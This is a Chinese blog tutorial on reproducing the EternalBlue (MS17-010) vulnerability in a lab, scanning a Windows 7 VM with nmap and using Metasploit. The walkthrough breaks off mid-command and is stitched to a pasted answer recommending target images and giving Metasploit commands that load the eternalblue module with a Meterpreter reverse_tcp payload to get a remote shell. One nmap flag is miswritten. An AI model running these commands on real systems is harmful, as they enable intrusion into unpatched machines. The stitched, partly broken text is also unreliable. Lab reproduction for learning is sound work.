永恒之蓝(ms17-010)漏洞复现,进行简单后渗透信息收集

本文详细介绍如何利用MS17-010(永恒之蓝)漏洞进行攻击演练,包括环境配置、漏洞扫描、攻击模块使用及后渗透信息收集等关键步骤。

申明
本文章仅供学习使用


环境准备:
win7虚拟机(靶机)
ip:192.168.56.134

kali虚拟机(攻击机)
ip:172.18.20.164

要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁


实验开始:
先用nmap扫描一下靶机开了哪几个端口:

nmap -Sv -p 1-1000 192.168.56.134

在这里插入图片描述
跑了两分钟,发现win7着实开了445端口。接下来直接打开msfconsole来进行攻击。
打开msfconsole会随机跳出图案,每一次打开都不一样
打开msfconsole会随机跳出图案,每一次打开都不一样。
接下来使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击即可。

如果忘了模块名问题也不大,直接搜索漏洞名字ms17-010即可:

search ms17-010

在这里插入图片描述
根据后面的等级(rank)来进行选择即可。这里使用exploit/windows/smb/ms17_010_eternalblue模块哈,命令如下:

u
在进行永恒之蓝MS17-010漏洞实验时,选择合适的靶机镜像至关重要。该实验通常基于Windows系统,因为永恒之蓝漏洞主要影响的是Windows SMB服务。以下是一些推荐的靶机镜像资源和获取方式: ### 靶机镜像推荐 1. **Windows 7 SP1 x64/x86** Windows 7 SP1 是永恒之蓝漏洞复现中最常用的系统版本之一,因为它未默认安装补丁,且广泛存在于当时的环境中。可以在一些虚拟化平台或社区分享中找到未经修补的镜像[^1]。 2. **Windows Server 2008 R2 SP1** 另一个常见选择是 Windows Server 2008 R2 SP1,它同样存在该漏洞且适合企业级环境模拟测试。可以从微软官方评估中心下载试用版ISO文件,并通过虚拟机工具创建靶机[^3]。 3. **Metasploitable 2/3** 虽然 Metasploitable 主要用于教学和练习,但其某些版本也包含可被利用的SMB服务配置,适合初学者进行基础练习。可以从 SourceForge 获取 Metasploitable 2 的 VHD 或 OVA 文件[^4]。 4. **自定义靶机** 在 Kali Linux 上使用 `msfconsole` 进行漏洞测试时,也可以自行搭建靶机环境。例如,在 VirtualBox 或 VMware 中安装未打补丁的 Windows 系统,并关闭自动更新功能以确保漏洞依然存在[^3]。 ### 下载与配置建议 - **中科大Kali镜像源** 提供了完整的Kali Linux ISO镜像,适用于搭建攻击机环境。可以访问其镜像站获取最新版本: ``` deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib ``` 安装完成后,可通过 `apt update && apt install metasploit-framework` 安装 Metasploit Framework [^2]。 - 永恒之蓝模块在 Metasploit 中的路径为: ``` use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP> set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <本地监听IP> run ``` 成功利用后将获得 Meterpreter Shell,可用于进一步渗透操作[^4]。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值